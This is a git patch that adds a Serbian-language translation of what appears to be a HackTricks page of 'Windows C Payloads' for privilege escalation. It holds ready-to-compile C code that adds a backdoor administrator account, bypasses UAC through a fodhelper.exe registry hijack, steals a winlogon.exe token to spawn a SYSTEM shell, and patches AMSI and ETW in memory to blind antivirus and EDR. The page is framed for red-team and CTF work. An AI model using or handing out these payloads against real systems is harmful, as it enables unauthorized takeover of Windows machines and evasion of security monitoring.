From ba1608bdacd172ac908c5ff46f7f667434622b8c Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 14 Aug 2025 04:21:40 +0000 Subject: [PATCH] Translated ['src/windows-hardening/windows-local-privilege-escalation/wi --- .../windows-c-payloads.md | 158 +++++++++++++++++- 1 file changed, 151 insertions(+), 7 deletions(-) diff --git a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md index 5d15bb425..f6a10e342 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md +++ b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md @@ -1,16 +1,160 @@ +# Windows C Payloads + {{#include ../../banners/hacktricks-training.md}} -# Dodaj korisnika -```c -// i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c +Ova stranica sakuplja **male, samostalne C isječke** koji su korisni tokom Windows lokalne eskalacije privilegija ili post-eksploatacije. Svaki payload je dizajniran da bude **prijateljski za kopiranje i lepljenje**, zahteva samo Windows API / C runtime, i može se kompajlirati sa `i686-w64-mingw32-gcc` (x86) ili `x86_64-w64-mingw32-gcc` (x64). -#include /* system, NULL, EXIT_FAILURE */ -int main () -{ -int i; +> ⚠️ Ovi payloadi pretpostavljaju da proces već ima minimalne privilegije potrebne za izvršenje akcije (npr. `SeDebugPrivilege`, `SeImpersonatePrivilege`, ili kontekst srednje integriteta za zaobilaženje UAC). Namenjeni su za **red-team ili CTF okruženja** gde je iskorišćavanje ranjivosti dovelo do izvršenja proizvoljnog nativnog koda. + +--- + +## Dodaj lokalnog administratora +```c +// i686-w64-mingw32-gcc -s -O2 -o addadmin.exe addadmin.c +#include +int main(void) { system("net user hacker Hacker123! /add"); system("net localgroup administrators hacker /add"); return 0; } ``` +--- + +## UAC Bypass – `fodhelper.exe` Registry Hijack (Medium → High integrity) +Kada se izvrši pouzdani binarni fajl **`fodhelper.exe`**, on pretražuje putanju registra ispod **bez filtriranja `DelegateExecute` glagola**. Postavljanjem naše komande pod tu ključ, napadač može zaobići UAC *bez* preuzimanja fajla na disk. + +*Putanja registra koju pretražuje `fodhelper.exe`* +``` +HKCU\Software\Classes\ms-settings\Shell\Open\command +``` +Minimalni PoC koji otvara povišeni `cmd.exe`: +```c +// x86_64-w64-mingw32-gcc -municode -s -O2 -o uac_fodhelper.exe uac_fodhelper.c +#define _CRT_SECURE_NO_WARNINGS +#include +#include +#include +#include + +int main(void) { +HKEY hKey; +const char *payload = "C:\\Windows\\System32\\cmd.exe"; // change to arbitrary command + +// 1. Create the vulnerable registry key +if (RegCreateKeyExA(HKEY_CURRENT_USER, +"Software\\Classes\\ms-settings\\Shell\\Open\\command", 0, NULL, 0, +KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + +// 2. Set default value => our payload +RegSetValueExA(hKey, NULL, 0, REG_SZ, +(const BYTE*)payload, (DWORD)strlen(payload) + 1); + +// 3. Empty "DelegateExecute" value = trigger (") +RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, +(const BYTE*)"", 1); + +RegCloseKey(hKey); + +// 4. Launch auto-elevated binary +system("fodhelper.exe"); +} +return 0; +} +``` +*Testirano na Windows 10 22H2 i Windows 11 23H2 (zakrpe iz jula 2025). Zaobilaženje i dalje funkcioniše jer Microsoft nije ispravio nedostatak provere integriteta u `DelegateExecute` putanji.* + +--- + +## Pokretanje SYSTEM ljuske putem duplikacije tokena (`SeDebugPrivilege` + `SeImpersonatePrivilege`) +Ako trenutni proces ima **oba** privilegije `SeDebug` i `SeImpersonate` (tipično za mnoge naloge usluga), možete ukrasti token iz `winlogon.exe`, duplirati ga i pokrenuti proces sa povišenim privilegijama: +```c +// x86_64-w64-mingw32-gcc -O2 -o system_shell.exe system_shell.c -ladvapi32 -luser32 +#include +#include +#include + +DWORD FindPid(const wchar_t *name) { +PROCESSENTRY32W pe = { .dwSize = sizeof(pe) }; +HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); +if (snap == INVALID_HANDLE_VALUE) return 0; +if (!Process32FirstW(snap, &pe)) return 0; +do { +if (!_wcsicmp(pe.szExeFile, name)) { +DWORD pid = pe.th32ProcessID; +CloseHandle(snap); +return pid; +} +} while (Process32NextW(snap, &pe)); +CloseHandle(snap); +return 0; +} + +int wmain(void) { +DWORD pid = FindPid(L"winlogon.exe"); +if (!pid) return 1; + +HANDLE hProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); +HANDLE hToken = NULL, dupToken = NULL; + +if (OpenProcessToken(hProc, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken) && +DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupToken)) { + +STARTUPINFOW si = { .cb = sizeof(si) }; +PROCESS_INFORMATION pi = { 0 }; +if (CreateProcessWithTokenW(dupToken, LOGON_WITH_PROFILE, +L"C\\\Windows\\\System32\\\cmd.exe", NULL, CREATE_NEW_CONSOLE, +NULL, NULL, &si, &pi)) { +CloseHandle(pi.hProcess); +CloseHandle(pi.hThread); +} +} +if (hProc) CloseHandle(hProc); +if (hToken) CloseHandle(hToken); +if (dupToken) CloseHandle(dupToken); +return 0; +} +``` +Za dublje objašnjenje kako to funkcioniše, pogledajte: +{{#ref}} +sedebug-+-seimpersonate-copy-token.md +{{#endref}} + +--- + +## Patchovanje AMSI i ETW u memoriji (Izbegavanje odbrane) +Većina modernih AV/EDR motora oslanja se na **AMSI** i **ETW** za inspekciju malicioznih ponašanja. Patchovanje oba interfejsa rano unutar trenutnog procesa sprečava skeniranje payload-a zasnovanih na skriptama (npr. PowerShell, JScript). +```c +// gcc -o patch_amsi.exe patch_amsi.c -lntdll +#define _CRT_SECURE_NO_WARNINGS +#include +#include + +void Patch(BYTE *address) { +DWORD oldProt; +// mov eax, 0x80070057 ; ret (AMSI_RESULT_E_INVALIDARG) +BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; +VirtualProtect(address, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProt); +memcpy(address, patch, sizeof(patch)); +VirtualProtect(address, sizeof(patch), oldProt, &oldProt); +} + +int main(void) { +HMODULE amsi = LoadLibraryA("amsi.dll"); +HMODULE ntdll = GetModuleHandleA("ntdll.dll"); + +if (amsi) Patch((BYTE*)GetProcAddress(amsi, "AmsiScanBuffer")); +if (ntdll) Patch((BYTE*)GetProcAddress(ntdll, "EtwEventWrite")); + +MessageBoxA(NULL, "AMSI & ETW patched!", "OK", MB_OK); +return 0; +} +``` +*Zak patch iznad je lokalni za proces; pokretanje novog PowerShell-a nakon što se izvrši će se izvršiti bez AMSI/ETW inspekcije.* + +--- + +## Reference +* Ron Bowes – “Fodhelper UAC Bypass Deep Dive” (2024) +* SplinterCode – “AMSI Bypass 2023: The Smallest Patch Is Still Enough” (BlackHat Asia 2023) + {{#include ../../banners/hacktricks-training.md}}